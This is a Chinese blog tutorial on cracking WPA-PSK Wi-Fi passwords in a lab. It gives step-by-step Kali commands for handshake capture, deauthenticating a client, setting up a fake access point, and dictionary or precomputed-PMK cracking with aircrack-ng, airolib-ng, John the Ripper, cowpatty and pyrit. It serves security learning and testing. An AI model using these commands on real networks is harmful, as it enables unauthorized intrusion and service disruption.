无线网络WPA的攻击

主要有PSK攻击和AIROLIB、JTR、cowpatty、pyrit等工具的使用

(一)WPA PSK 攻击
WPA不存在WEP的弱点,只能基于字典暴力破解
PSK破解过程
启动monitor
抓握手包并保存
deauthentication攻击获取4步握手信息
字典暴力破解

2.实践
AP设置为WPA,AES加密

2.1
首先检测专用的USB无线网卡,我用的是RT3070(或者是RTL8187都可以) 就是这里的wlan0

2.2
停止掉一些不必要的服务:service network-manager stopairmon-ng check kill
然后启动网卡的monitor 模式: airmon-ng start wlan0

开始网络探测:airodump-ng wlan0mon

2.3
拿第一个无线实验,抓取握手包

airodump-ng -c 11 --bssid 2C:XX:XX:1D:53:50 -w wpa wlan0mon

#抓包,-c指定信道,–bssid指定侦听的AP,-w写入wpa文件

发现有一个客户端在线,但是没有握手包,所以 deauthentication攻击让他重连,来尽可能多的抓包,aireplay-ng -0 2 -a 2C:XX:XX:1D:53:50 -c DC:EF:XX:XX:XX:XX wlan0mon
-0指定攻击次数,-a指定AP,-c指定客户端

#成功抓取握手信息,wpa-01.cap

2.4
用自带字典暴力破解,得到了密码
aircrack-ng -w /usr/share/john/password.lst wpa-01.cap
字典还有以下这些
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/
#/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/
#/usr/share/wordlists/rockyou.txt.gz

这里的密码比较简单能用字典很快跑出来,但是如果密码比较复杂可能跑不出来。

2、无AP情况下的WPA密码破解
启动monitor
抓包并保存
根据probe信息伪造相同ESSID的AP
获取4步握手信息的前两个包
字典暴力破解
实践
窗口1 伪装AP,下面二选一

airbase-ng --essid leon -c 11 -z 2 wlan0mon #伪装AP,-z 2指定TKIP,即WPA1
airbase-ng --essid leon -c 11 -Z 4 wlan0mon #伪装AP,-Z 4指定WPA2

1
窗口2 侦听抓包

airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wpa wlan0mon #-c指定信道,--bssid指定侦听的AP,-w写入wpa文件

进行密码破解

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap #wpa这个文件就是抓包,可以用wireshark打开看看
#这时未成功连接,只有前面两个包,有可能破解不了

3、AIROLIB破解密码
原理
计算生成不变的PMK
PMK在破解阶段用于计算PTK
通过完整性摘要值破解密码
SQLite3数据库存储数据
实践

echo kifi > essid.txt
airolib-ng db --import essid essid.txt #创建数据库db
airolib-ng db --stats #当前数据库状态
airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt #导入密码
airolib-ng db --batch #批处理,计算出PMK
aircrack-ng -r db wpa-01.cap #破解

4、JTR破解密码
基于规则扩展密码字典
获取手机号段利用JTR规则增加最后几位数字
vi打开配置文件/etc/john/john.conf
在[List.Rules:Wordlist]最后
加一段[0−9][0-9][0−9][0-9][0−9][0-9][0−9][0-9]

john --wordlist=yd.txt --rules --stdout #根据yd.txt生成密码字典
john --wordlist=yd.txt --rules --stdout | aircrack-ng -e kifi -w - wpa-01.cap #破解,-w -指定前面输出的内容

5、cowpatty破解密码
WPA通用破解工具,多平台
(1)密码字典破解

cowpatty -r wpa-01.cap -f /usr/share/john/password.lst -s kifi #用密码字典

(2)PMK破解

genpmk -f /usr/share/john/password.lst -d pmkhash -s kifi #生成PMK
cowpatty -r wpa-01.cap -d pmkhash -s kifi #用PMK破解

6、pyrit破解密码
与airolib、cowpatty相同,支持基于预计算的PMK提高破解速度
除了CPU,还可以用GPU
本身支持抓包获取四步握手,无需airodump

pyrit -r wlan0mon -o wpapyrit.cap stripLive #抓取WPA四次握手
pyrit -r wpapyrit.cap analyze #对抓来的包进行分析
pyrit -r wpa.cap -o wpapyrit.cap strip #如果是用airodump抓的包,需要转换再分析

(1)密码字典破解

pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b EC:26:CA:DC:29:B6 attack passthrough
#-b指定AP的MAC

(2)数据库模式破解

pyrit eval #查看默认数据库状态
pyrit -i /usr/share/john/password.lst import passwords #导入密码字典
pyrit -e kifi create essid #指定essid
pyrit batch #计算生成PMK,发挥GPU能力
pyrit -r wpapyrit.cap -b EC:26:CA:DC:29:B6 attack db #破解密码

结语
WPA安全性远高于WEP
破解难度高很多
pyrit工具比较好用

参考:
https://blog.csdn.net/weixin_44604541/article/details/104841574

Kali渗透测试(四)——无线网络WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit)相关推荐

  1. Kali渗透测试:使用工具Metasploit攻击操作系统

    Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击.Metasploit是目前非常优秀的一款漏洞渗透工具. 1. ...

  2. Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击

    Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击 Burp Suite 是用于攻击Web应用的集成平台,这个平台集成了许多工具.如何使用它来破解一些网站的密码.首先我们查看一个需要用 ...

  3. Kali渗透测试:使用Armitage针对漏洞进行攻击

    Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例("永恒之蓝")经典的漏洞,单击这个模块以后就可以开始攻击了. 实 验 环 境 ...

  4. Kali渗透测试:网络数据的嗅探与欺骗

    Kali渗透测试:网络数据的嗅探与欺骗 无论什么样的漏洞渗透模块,在网络中都是以数据包的形式传输的,因此如果我们能够对网络中的数据包进行分析,就可以掌握渗透的原理. 另外,很多网络攻击的方法也都是发送 ...

  5. Kali渗透测试:身份认证攻击

    Kali渗透测试:身份认证攻击 1.1 简单网络服务认证的攻击 网络上很多常见的应用都采用了密码认证的方式,如SSH.Telnet.FTP等.这些应用被广泛应用在各种网络设备上,如果这些认证模式出现问 ...

  6. Kali渗透测试:拒绝服务攻击

    Kali渗透测试:拒绝服务攻击 故意占用某一系统对外服务的有限资源,从而导致其无法正常工作的行为就是拒绝服务攻击.拒绝服务攻击是指攻击者想办法让目标停止提供服务,是黑客常用的攻击手段之一.其实对网络带 ...

  7. Kali渗透测试:使用browser_autopwn2模块进行渗透攻击

    Kali渗透测试:使用browser_autopwn2模块进行渗透攻击 如果觉得一个一个地选择模块很麻烦, 也可以使用browser_autopwn模块.这种攻击的思路是渗透者构造一个攻击用的Web服 ...

  8. Kali渗透测试:使用Metasploit对Web应用的攻击

    Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下.这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从 ...

  9. Kali 渗透测试:利用HTA文件进行渗透攻击

    Kali 渗透测试:利用HTA文件进行渗透攻击 由于浏览器安全技术发展很快,很多时候面对一些安全的浏览器(就是暂时没有发现漏洞的浏览器), 这时通常需要选择一种不需要依赖漏洞的手段,这种手段看起来是个 ...

最新文章

  1. 用于自动泊车的鸟瞰图的边缘线的语义SLAM系统
  2. 第10章 嵌入式linux的调试技术
  3. 自定义 checkbox 新玩法 ?
  4. 1.5 卷积步长-深度学习第四课《卷积神经网络》-Stanford吴恩达教授
  5. 高中计算机应用基础试讲,试讲计算机应用基础.ppt
  6. Oracle高级SQL培训与讲解
  7. filebeat 配置文件详解
  8. 宅在家里写数据库中事务(ACID)
  9. 深圳荔枝公园没看到夜景(可能过节才有)
  10. 并发测试工具(ubuntu 16.04)
  11. 辨别身份真假之【天眼数聚】腾讯云身份证实名认证接口
  12. MySQL必知必会——第十四章使用子查询
  13. 【微信机器人】实现保存微信表情包到相册
  14. 电子信息要学c语言嘛,电子信息工程专业主要学什么 一般工资是多少
  15. 《操作系统》学习笔记|6.6外存空间管理
  16. JavaScript 去除数组中重复的元素 得到新数组
  17. 查看ubuntu系统的版本信息、内存大小及使用、磁盘大小等常用命令
  18. 网络舆情风险点排查工作实施方案
  19. CLRS 6.3建堆
  20. iOS开发 -- iPhone手机屏幕尺寸

热门文章

  1. 基于javaweb的图书管理系统(java+jsp+layui+bootstrap+servlet+mysql)
  2. 自私型人格分析,如何改变自私型性格?
  3. java生成二维码技术实现
  4. windows10系统-12-WPS文档编辑排版
  5. 【Word】长文档排版
  6. 分享多张图片到微信朋友圈
  7. 科大讯飞语音无限制录音、识别功能的实现:Android studio(一)
  8. 微信JS-SDK的PHP demo页面,解决Internal error 500错误
  9. 有用的“歪门邪道”-设计模式
  10. Docker 取代 VM !是什么让 Docker 比 VM 或裸机更安全?